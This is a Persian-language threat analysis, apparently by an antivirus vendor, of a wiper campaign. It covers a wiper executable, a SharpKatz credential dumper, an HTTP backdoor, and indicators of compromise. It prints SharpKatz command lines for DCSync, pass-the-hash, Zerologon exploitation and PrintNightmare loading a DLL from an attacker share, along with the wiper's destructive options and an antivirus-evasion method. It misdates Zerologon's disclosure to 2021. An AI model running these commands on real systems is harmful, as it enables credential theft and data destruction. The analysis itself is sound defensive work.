1 جزئیات فنی
1.1 ماژولها و توالی عملیات بدافزار
این بدافزار شامل ماژولهای بسیاری اعم از برنامه اجرایی و اسکریپتهای مختلف است که هر یک وظیفه کوچک خود را برعهده دارند.
در ادامه لیست فایلهای بدافزار به همراه شرح مختصری از عملکرد آنها را مشاهده میکنید.
نام فایل |
توضیحات |
wint.bat |
اجرای تسک زمانبند جهت اجرای سرویس فایل msdskint.exe |
msdskint.exe |
تخریب اطلاعات هارددیسک (Wipe)، تغییر رمزعبور کاربران، حذف فایلهای پشتیبان ویندوز و … |
Sharpk.exe |
ابزاری جهت بازیابی اطلاعات اعتبارسنجی کاربران |
uhsvc.exe |
به عنوان Httpservice جهت ارتباط با سرورهای c&c، هکر با استفاده از این فایل اقدام به کپی ابزار Sharpk.exe نیز نموده است. |
Lastfile |
محتوی مسیر آخرین فایل تخریب شده |
جدول 1 – شرع مختصر عملکرد پی لودهای بدافزار
1.1.1 شرح عملیات فایل sharpk.exe
این ابزار در Github منتشر شده است و ماژول Sekurlsa و lsadump از mimikatz را پیاده سازی میکند. Sharpkatz جهت کشف اطلاعات کاربری از هاستهای مبتنی بر ویندوز مورد استفاده قرار میگیرد.
این ابزار از چندین ماژول تشکیل شده است که برای عملکردهای مختلف حمله طراحی شدهاند. برخی از ماژولهای رایج و مورد استفاده عبارتند از:
MSV,Kerberos,TSPKG,Windows Credential Manager,Wdigest
ماژولهای اصلی که توسط این ابزار قابل اجرا هستند به شرح زیر میباشد:
-
Lsadump
این ماژول جهت استخراج هش یک کاربر خاص مورد استفاده قرار میگیرد.
-
Pth
با هش یک کاربر خاص از تمامی دسترسیها جهت سرقت نام کاربری و رمز عبور استفاده میکند. این ماژول برای درست کار کردن نیاز به دسترسی Admin ندارد و یک کاربر عادی نیز میتواند این ماژول را اجرا کند.
-
LogonPasswords
اطلاعات اعتبارسنجی کاربرانی که اخیراً وارد سیستم شدهاند را نمایش میدهد.
-
Zerologon (جهت سرقت اطلاعات مربوط به اکتیو دایرکتوری)
آسیبپذیری Zerologon یا CVE-2020-1472 یکی از این آسیبپذیریهایی میباشد که خبر آن برای اولین بار در سپتامبر 2021 منتشر شد. این آسیبپذیری که به دلیل شیوهی پیادهسازی رمزنگاری توسط مایکروسافت در پروسس Netlogon به وجود آمده، این قابلیت را به مهاجمین میدهد تا به سرورهای ویندوزی و به خصوص سرورهای اکتیو دایرکتوری حمله کرده و اطلاعات آن را به سرقت برند.
-
DCSync
ماژول DCSync در sharpkatz به مهاجم اجازه میدهد وانمود کند که یک کنترلکننده دامنه است و هش رمز عبور را از کنترلکنندههای دامنه دیگر بازیابی میکند، بدون اینکه کدی را روی هدف اجرا کند.
در جدول زیر نیز لیست آرگومانهای قابل دریافت توسط فایل sharpk.exe به همراه عملکرد آنها آورده شده است.
آرگومان ورودی | شرح عملکرد |
–Command ekeys |
لیست کلیدهای رمزگذاری kerberos را نمایش میدهد (kerberos پروتکلی برای احراز هويت در شبكه است) |
–Command msv |
بازیابی اطلاعات اعتبارسنجیهای کاربر از msv شامل اطلاعات logons, batch logons, و service logons |
–Command kerberos |
بازیابی اطلاعات اعتبارسنجیهای کاربر از kerberos |
–Command tspkg |
بازیابی اطلاعات اعتبارسنجیهای کاربر از tspkg |
–Command credman |
بازیابی اطلاعات اعتبارسنجیهای کاربر از credman |
–Command wdigest |
بازیابی اطلاعات اعتبارسنجیهای کاربر از wdigest |
–Command logonpasswords |
بازیابی اطلاعات اعتبارسنجیهای کاربر از logonpasswords |
–Command listshadows |
نمایش لیست نسخههای پشتیبان سیستم |
–Command dumpsam –System syspath –Sam sampath |
گرفتن دامپ از اطلاعات اعتبارسنجیهای داخل پایگاه دادهی SAM |
–Command pth –User username –Domain userdomain –NtlmHash ntlmhash |
ایجاد فرآیندی تحت اعتبار دامنه کاربری یا نام کاربری به وسیلهی هش ntlm رمز کاربر |
–Command pth –User username –Domain userdomain –Rc4 rc4key |
ایجاد فرآیندی تحت کلید rc4 اعتبار دامنه کاربری یا نام کاربری |
–Command pth –Luid luid –NtlmHash ntlmhash |
هش ntlm را برای یک Logonsession موجود جایگزین میکند. |
–Command pth –User username –Domain userdomain –NtlmHash ntlmhash –aes256 aes256 |
ایجاد فرآیندی تحت اعتبار دامنه کاربری یا نام کاربری به وسیلهی هش ntlm رمز کاربر و هش ntlm کلید aes256 |
–Command dcsync –User user –Domain userdomain –DomainController dc |
گرفتن دامپ از اطلاعات اعتبارسنجیهای کاربر توسط نام کاربری |
–Command dcsync –Guid guid –Domain userdomain –DomainController dc |
گرفتن دامپ از اطلاعات اعتبارسنجیهای کاربر توسط guid |
–Command dcsync –Domain userdomain –DomainController dc |
ایجاد فایلی در فولدر temp کاربر جاری، شامل اطلاعات استخراج شده از AD |
–Command dcsync –User user –Domain userdomain –DomainController dc –AuthUser authuser –AuthDomain authdomain –AuthPassword authuserpassword |
گرفتن دامپ از اطلاعات اعتبارسنجیهای کاربر توسط نام کاربری با استفاده از اطلاعات اعتبارسنجیهای جایگزین |
–Command dcsync –Guid guid –Domain userdomain –DomainController dc –AuthUser authuser –AuthDomain authdomain –AuthPassword authuserpassword |
گرفتن دامپ از اطلاعات اعتبارسنجیهای کاربر توسط نام کاربری با استفاده از guid |
–Command dcsync –Domain userdomain –DomainController dc –AuthUser authuser –AuthDomain authdomain –AuthPassword authuserpassword |
ایجاد فایلی در فولدر temp کاربر جاری، شامل اطلاعات استخراج شده از ADتوسط اطلاعات اعتبارسنجی جایگزین |
–Command zerologon –Mode check –Target WIN-NSE5CPCP07C.testlab2.local –MachineAccount WIN-NSE5CPCP07C$ |
بررسی وجود آسیبپذیری Zerologon در سیستم |
–Command zerologon –Mode exploit –Target WIN-NSE5CPCP07C.testlab2.local –MachineAccount WIN-NSE5CPCP07C$ |
نفوذ با استفاده از آسیبپذیری zerologon |
–Command zerologon –Mode auto –Target WIN-NSE5CPCP07C.testlab2.local –MachineAccount WIN-NSE5CPCP07C$ –Domain testlab2.local –User krbtgt –DomainController WIN-NSE5CPCP07C.testlab2.local |
نفوذ با استفاده از آسیبپذیری zerologon و گرفتن دامپ از اعتبار نامه کاربر به وسیلهی نام کاربری |
–Command zerologon –Mode auto –Target WIN-NSE5CPCP07C.testlab2.local –MachineAccount WIN-NSE5CPCP07C$ –Domain testlab2.local –Guid guid –DomainController WIN-NSE5CPCP07C.testlab2.local |
نفوذ با استفاده از آسیبپذیری zerologon و گرفتن دامپ از اعتبارنامه کاربر به وسیلهی GUID |
–Command zerologon –Mode auto –Target WIN-NSE5CPCP07C.testlab2.local –MachineAccount WIN-NSE5CPCP07C$ –Domain testlab2.local –DomainController WIN-NSE5CPCP07C.testlab2.local |
نفوذ با استفاده از آسیبپذیری zerologon و ایجاد فایلی در فولدر temp کاربر جاری، شامل اطلاعات استخراج شده از AD توسط اعتبارنامه جایگزین |
–Command printnightmare –Target dc –Library \\\\mycontrolled\\share\\fun.dll |
نفوذ با استفاده از آسیبپذیری PrintNightmare |
–Command printnightmare –Target dc –Library \\\\mycontrolled\\share\\fun.dll –AuthUser user –AuthPassword password –AuthDomain dom |
نفوذ با استفاده از آسیبپذیری PrintNightmare و اعتبار ارائه شده |
جدول 2 – شرح دستورات ابزار Sharpkatz
1.1.2 شرح عملیات تسک NETWSM.
این تسک زمانبند وظیفه اجرای فایل wint.bat را برعهده دارد.
c:\programdata\pcmr\wint.bat
1.1.3 شرح عملیات فایل wint.bat
این فایل اجرا کننده سرویس Wiper بدافزار میباشد. سرویسی با نام جعلی Windows Taks Scheduler که همانطور که در نام سرویس مشخص است، به جای کلمه “Tasks” از کلمه “Taks” استفاده شده است. فایل Wiper با نام msdskint.exe در سیستمهای مختلف در مسیرهای زیر دیده شده است:
سیستم HGH-HGH-KHSRAVI:
c:\windows\ccmcache\6\msdskint.exe
سایر سیستمها:
c:\programdata\pcmr\msdskint.exe
1.1.4 شرح عملیات فایل msdskint.exe
این فایل، Wiper ایجاد شده توسط هکر میباشد که میتواند آرگومانهایی از ورودی دریافت کند. در صورتی که هیچ آرگومان ورودی وارد نشده باشد نیز فایل مذکور دارای آرگومانهای از پیش تعریف شده میباشد که از همانها در طول اجرا استفاده میکند.
هکر این فایل را با استفاده از ابزار “Eziriz .NET Reactor” پک کرده است. با این مقصود که کد بدافزار از دید تحلیلگر و آنتیویروس مخفی بماند. در ادامه شرح عملیات بدافزار بعد از دیکد برنامه شرح داده شده است.
در جدول زیر لیست آرگومانهای قابل دریافت توسط فایل msdskint.exe به همراه عملکرد آنها آورده شده است.
آرگومان ورودی | شرح عملکرد |
-wipe-exclude | مسیرهایی که بعد از این آرگومان قرار گرفته شده به لیست استثنائات بدافزار اضافه میشود تا عملیات تخریب (Wipe) بر روی آنها انجام نگیرد. |
-light-wipe | تعداد دفعاتی که بافر مورد نظر بدافزار جهت تخریب روی فایلهای سیستم قربانی نوشته میشود. |
-sessions | سبب میشود تمامی Sessionهای اکتیو سیستم Logoff و ریستارت شوند. |
-delete-users | اکانت کاربران وارد شده به همراه این آرگومان از سیستم حذف میشوند. |
-shadows | تمامی نسخههای پشتیبان گرفته شده از اطلاعات سیستم پاک میشوند. |
-start-iis | سرویس iis استارت میشود. |
-config | عملیاتی تعریف نشده است. |
-processes | پردازههای وارد شده به همراه این آرگومان خاتمه پیدا میکنند. |
Logs- | بدافزار با استفاده از ابزار wevtutil.exe ویندوز و Enum همه لاگهای سیستم عامل، تمام لاگهای Event viewer را پاک میکند. |
-delete | در صورت وارد شدن این آرگومان، فایلهایی که wipe میشوند در نهایت از سیستم حذف میشوند. (تابع Win32Native.DeleteFile ویندوز اجرا میشود) |
-break-users | تغییر کلمه عبور کاربران سیستم قربانی |
-wipe-only | تنها فایلهای موجود در مسیرهایی که وارد شده تخریب میشوند. |
-purge | به معنی پاکسازی کامل میباشد که در آن روند تخریب محتوای فایل با روند معمولی متفاوت است. |
-passwords | عملیاتی تعریف نشده است. |
-wipe-all | تخریب اطلاعات کلیه درایوهای سیستم |
-stop-iis | سرویس iis متوقف میشود. |
جدول 3 – شرح دستورات بدافزار Wiper
در ادامه به شرح تفصیلی هر یک از آرگومانهایی که نیاز به توضیح بیشتر دارند میپردازیم.
-
آرگومان break-users–
اگر این آرگومان وارد شده باشد و کاربری مشخص شده باشد، بدافزار به ازای هر یک از اکانتهای تعریف شده در سیستم یک کلمه عبور ست میکند. این کلمه عبور رشته ثابت “S7Y1a82R!” میباشد.
تصویر 2 – تغییر کلمه عبور کاربران توسط بدافزار
-
آرگومان purge–
این آرگومان در هنگام عمل Wipe بر روی فایلها مورد استفاده قرار میگیرد. به طور کلی مقداری که بدافزار برای تخریب (Wipe) اطلاعات در نظر میگیرد، یک بافر 200 بایتی است که محتوای آن طی یک الگوریتم به صورت تصادفی ساخته میشود.
اگر آرگومان purge وارد شده باشد، مقداری با نام full_purge در کد بدافزار ست میشود. این آیتم به معنای پاکسازی کامل برای بدافزار است. در این حالت روال تخریب بدافزار بر روی اطلاعات فایلها به این صورت است که مقدار داخل بافر را در بلاکهای ۲۰۰ بایتی روی فایل مینویسد تا به انتهای فایل برسد.
همچنین بدافزاری لیستی با نام purgeExtensions در کد خود جای داده است، این لیست شامل پسوندهای کاندید مورد نظر هکر میباشد. به این صورت که اگر فایلی که قرار است تخریب شود یکی از پسوندهای زیر را داشته باشد، روند تخریب اطلاعات آن فایل همانند روند full_purge خواهد بود.
علاوه بر لیست بالا، رشتههای دیگری نیز در فایل بدافزار به چشم میخورد که میتوانند به عنوان پسوندهای کاندید در نظر گرفته شوند. این پسوندها عبارتند از:
.accdb, .cdx, .dmp, .js, .pnf, .rom, .tif, .wmdb, .acl, .cfg, .doc, .hlp, .png, .rpt, .tiff, .wmv, .acm, .chk, .docx, .hpi, .lnk, .pps, .rsp, .tlb, .xdr, .amr, .com, .dot, .ppt, .sam, .tmp, .xls, .apln, .cpl, .drv, .pptx, .scp, .tsp, .xlsx, .asp, .cpx, .dwg, .hxx, .m4a, .pro, .scr, .avi, .dat, .eml, .ico, .mid, .psd, .sdb, .xsd, .ax, .db, .nls, .rar, .sig, .wab, .zip, .bak, .dbf, .ext, .one, .wab~, .bin, .dbx, .fdb, .jar, .pdf, .rdf, .sqlite, .wav, .bmp, .dll, .gif, .jpg, .pip, .resources, .theme, .wma, .config, .mxf, .mp3, .mp4, .cs, .vb, .tib, .aspx, .pem, .crt, .msg, .mail, .enc, .msi, .cab, .plb, .plt
- آرگومان wipe-all-
اگر این آرگومان وارد شده باشد، کل درایوهای فعال سیستم در یک لیست ذخیره میشود. سپس همه اطلاعات درایوها wipe میشود.
هنگام تخریب اطلاعات، 3 فایل استثناء میشوند:
- default.htm
- index.htm
- death_to_raisi.exe
روال تخریب اطلاعات توسط بدافزار در صورتی که مقدار full_purge ست نشده باشد یا پسوند فایلها جزء پسوندهای کاندید نباشد به این صورت است که ابتدا به اندازه 200 بایت بافر تعیین شده از آفست صفر روی فایل مینویسد. سپس کل سایز فایل را بر 1024 تقسیم میکند. این مقدار را در متغیر num4 ذخیره میکند.
اگر برای آرگومان light_wipe عدد وارد شده باشد، مینیمم مقدار بین light_wipe و num4 را محاسبه میکند و در num4 مینویسد.
سپس به اندازه num4 بار از آفست جاری 1024 بایت (0X400) فاصله میاندازد و روی 200 بایت بعدی همان مقدار را مینوسید و به همین ترتیب ادامه میدهد تا به انتهای فایل برسد. در نهایت فایل lastfile2 را در پوشه فایلی که تخریب شده میسازد و مسیر فایل را در آن یادداشت میکند.
همانطور که قبلا اشاره شد، فایل msdskint.exe در صورتی که آرگومانی به عنوان ورودی دریافت نکند نیز آرگومانهای از پیش تعریف شده دارد. این فایل در صورتیکه تحت سرویس اجرا شود دارای آرگومانهای پیشفرض زیر خواهد بود:
تصویر 4 – لیست رشتهها به عنوان آرگومان ورودی
با توجه به این آرگومانها، این سرویس به صورت زیر عمل خواهد کرد:
1. مقدار light-wipe- برابر 3 میباشد. به این معنی که بافر تخریب اطلاعات 3 بار بروی هر فایل نوشته میشود.
2. سرویس iis متوقف میشود.
3. تمامی لاگهای EventViewer سیستم عامل ویندوز پاک میشوند.
4. تمامی نسخههای پشتیبان پاک میشوند.
5. مقدار processes – برابر sql* میباشد. به این معنی که تمامی پردازههایی که در نام آنها رشته sql آمده باشد خاتمه مییابند.
6. تمامی اطلاعات درایوهای فعال به استثنای مسیرهای exclude شده تخریب میشود.
7. مسیرهای استثناء شده (exclude) توسط هکر به شرح زیر میباشند:
"C:\Windows" "C:\$Recycle.Bin" "C:\$WinREAgent" "C:\Config.Msi" "C:\MSOCache" "C:\Recovery" "C:\Program Files\IBM\*" "C:\System Volume Information" "C:\Program Files\dotnet" "C:\Program Files (x86)\dotnet*" "C:\Program Files\Symantec*" "C:\Program Files (x86)\Symantec*" "C:\Program Files (x86)\Padvish*" "C:\Program Files\Kaspersky*" "C:\Program Files (x86)\Kaspersky*" "C:\Program Files\Microsoft*" "C:\Program Files (x86)\Microsoft*" "C:\Program Files\Windows*" "C:\Program Files (x86)\Windows*"
در دستورات برنامه تابعی وجود دارد که نشان میدهد هکر به آنتی ویروس پادویش حساس بوده است. به عنوان مثال همانگونه که در تصویر 5 مشاهده میشود، بدافزار لیست پردازههای در حال اجرا روی سیستم را رصد میکند. در صورتی که در میان این پردازهها، سرویس پادویش یا UI آن بالا باشد، بدافزار به جای اجرای تابع پیش فرض خود برای Wipe اطلاعات، تلاش میکند عملیات wipe را از طریق دیگری انجام دهد.
به نظر میرسد علت این تغییر تاکتیک از طرف بدافزار، فرار از سیستم شناسایی رفتاری پادویش است که روش wipe اطلاعات آن را تشخیص داده و آن را بلافاصله به صورت خودکار متوقف میکند؛ اما در هر صورت روش دوم بدافزار نیز توسط پادویش شناسایی و متوقف میشود.
در روش دوم بدافزار سعی میکند به ازای هر یک از فایلهای سیستم، یک فایل bat موقت (tmp.bat) بسازد و برای این فایلهای موقت دو تسک زمانبند با مجوز سیستم ایجاد میکند.
تصویر 5 – جستجوی سرویس و UI آنتی ویروس پادویش توسط بدافزار
تصویر 6 – تغییر روش تخریب اطلاعات توسط بدافزار بعد از یافتن سرویس آنتی ویروس پادویش
در نمونه زیر مثالی از فایل bat ساخته شده را مشاهده میکنید:
تصویر 7 – نمونه ای از فایل bat ساخته شده جهت تخریب اطلاعات
همانطور که در محتوای این فایل bat مشخص است، ابتدا بدافزار با استفاده از ابزار fsutil سیستمعامل ویندوز یک فایل با محتوای null به اندازه حجم فایلی که میخواسته تخریب کند (در اینجا 3072 بایت) با پسوند qipe. ساخته است. سپس قصد داشته است این فایل ساختگی را جایگزین فایل اصلی نماید.
در واقع هکر با علم به این که آنتیویروس پادویش توانایی جلوگیری از تخریب اطلاعات سیستم را دارد، سعی داشته است از راه دیگری با استفاده از ابزارهای استاندارد سیستم برای حذف اطلاعات استفاده کند. با این وجود مولفه ضدباجگیر پادویش باز هم از وقوع این نوع حمله جلوگیری کرده است.
در کد برنامه دستوراتی وجود دارد که نشان میدهد این بدافزار میتواند، در زمان انجام عملیات لاگ زمان اجرای برنامه را به صورت زیر ذخیره کند:
در کد بدافزار رشتههایی با عناوین “– Excluded” ، “– Skipped” ، “BreakSelectedUsers” ، “DeleteSelectedUsers” ، “KillProcesses” و … به چشم میخورد. در هنگام خاتمه عملیات نیز این لاگ با رشته “Finished on ” و ثبت زمان پایان مییابد. با این وجود هکر ظاهراً نیازی به ذخیره لاگ با استفاده از فایل Wiper نداشته است. زیرا کدی برای تابع Output که وظیفه چاپ نتیجه عملیات را بر عهده داشته، در نظر گرفته نشده است.
1.1.5 شرح عملیات فایل uhsvc.exe
این فایل به عنوان httpservice برای هکر عمل میکند. اطلاعات مربوط به دستورات مورد نظر هکر در دو فایل uhsvc.exe.start و uhsvc.exe.ini ذخیره شده است.
این سرویس که با نام Microsoft Update Health Host در سیستم ثبت شده است، دارای کامندهایی جهت دانلود و آپلود فایل و همچنین ارتباط با پایگاه داده sql و ارسال نتایج به سرور مخرب و دستکاری فایلهای محلی میباشد. نسخههای مختلفی از این httpservice یافت شده است که عبارتند از 0.1.3vXH و 0.1.4vXH. این نسخهها در عملکرد کلی تفاوتی ندارند و دستورات یکسانی را میپذیرند.
این فایل همانند فایل Wiper هکر با استفاده از ابزار “Eziriz .NET Reactor” پک شده است. نتایج زیر با توجه به موارد مشاهده شده بعد از دیکد دستورات به دست آمده است:
1. بدافزار پس از آنکه تحت سرویس اجرا شد، یکtcpListener در سیستم قربانی ایجاد میکند. در ادامه یکی از نسخههای بدافزار که از پورت 9399 استفاده میکند تشریح میگردد. در نمونههای که از فایل uhsvc.exe.start یافته شده است، هکر پکتهای ورودی به پورت 9399 را از خارج از شبکه به سیستم قربانی در فایروال مجاز کرده است.
تصویر 8 – محتوای فایل uhsvc.exe.start
2. بدافزار قابلیت دریافت دستورات متفاوت از سرور هکر و اجرای آنها را دارد. بدافزار این دستورات را توسط ابزار cmd اجرا میکند.
تصویر 9 – اجرای فرامین مورد نظر هکر توسط شل
3. استفاده از توابع sqlConnection و sqlCommand جهت اجرای کوئریهای مختلف بر روی پایگاه داده SQL
4. ایجاد فایل
تصویر 10 – ایجاد فایل توسط هکر از طریق بدافزار
5.بدافزار قابلیت zip و unzip محتویات دایرکتوریها، دانلود/آپلود و در صورت لزوم حذف فایلهای مورد نظر هکر را دارد. این بدافزار جهت فشردهسازی فایلها از کتابخانه IonicZip استفاده میکند.
تصویر 11 – قابلیت فشرده سازی/بازگشایی و حذف فایل
تصویر 12– امکان دستکاری محتوای دایرکتوریها
6. قابلیت دریافت آدرس پراکسی مورد نظر سرور برای ارتباط با آن از طریق دستورات “p=” و “b=”
تصویر 13 – دستورات مربوط به پراکسی
7. امکان نمایش نسخه بدافزار برای هکر (هکر از چند نسخه Httpservice برای پیادهسازی عملیات خود استفاده کرده است).
8. امکان نمایش مسیر جاری فایل بدافزار (مسیر بدافزار “c:\programdata\pcmr\uhsvc.exe” بوده است).
9. امکان ایجاد فایل log و ارسال آن برای نمایش خطاهای احتمالی به هکر
در جدول زیر لیست عملیاتی که توسط بدافزار پشتیبانی میشود، نمایش داده شده است:
عملکرد |
دستور |
Shellexecute with #zip support |
a_1=s |
Run SQL commands |
a_1=c |
View output and error logs and delete them |
a_1=i1 |
Delete output and error logs |
a_1=i2 |
Run cmd interactively |
a_1=i |
Shellexecute |
Cmd= |
Show Malware path |
W_i |
Show Malware Version |
V_i |
Act as a proxy and forward connection to another website/infected node |
P= OR b= |
Write any file |
M=afe=1 |
Run SQL commands |
Con= |
File Manager (Browse directories, Download/Upload Files, …) |
Prt= |
Read/Write based on GET |
other |
جدول 4 – دستورات وب سرویس بدافزار
2 راهکارهای مقابله با بدافزار
همه نمونههای شناخته شده این بدافزار با اسامی HackTool.Win32.HTTPbackdoor ،HackTool.Win32.SharpKatz و Trojan.Win32.QWipe توسط پادویش شناسایی میشوند.
به علاوه، ویژگی منحصر به فرد محافظت اطلاعات پادویش با تشخیص عملکرد Wipe توسط این بدافزار، مانع از تخریب اطلاعات توسط بدافزار شده و به اجرای آن خاتمه میدهد.
3 نشانههای آلودگی (IOC)
نام فایل |
MD5 |
uhsvc.exe |
466832ef3f81f1cc37466be9e1b7c4d2 9fbab064ec583f80dc15e1abc2ebcad3 2529ed634df912d95d52be717560b0b6 cc97e34cf19f56263abd0f89e907cf7a 66e6d3b03613074f38b2a6acff8e8229 94354ecf588835cea2352b873211290e af029e3168e27394020b3f4315b2419b 2c1e86a5c5c5ad19d64baa66e78af6f1 e633f5ce289cdcbdee93b7c02178fa35 4cc3665c4fb23ace6b0f9b396c66f8e6 |
uhsvc.exe.start |
381d8239561c3714c1b71f0c2df4f57e |
msdskint.exe |
13e7caebf00dd2315885e1f47030eb3c |
wint.bat |
0aa3b91d584803a39250742b69173841 |
Sharpk.exe |
3ea25f166bef1bf79c374f16f2e4e29f |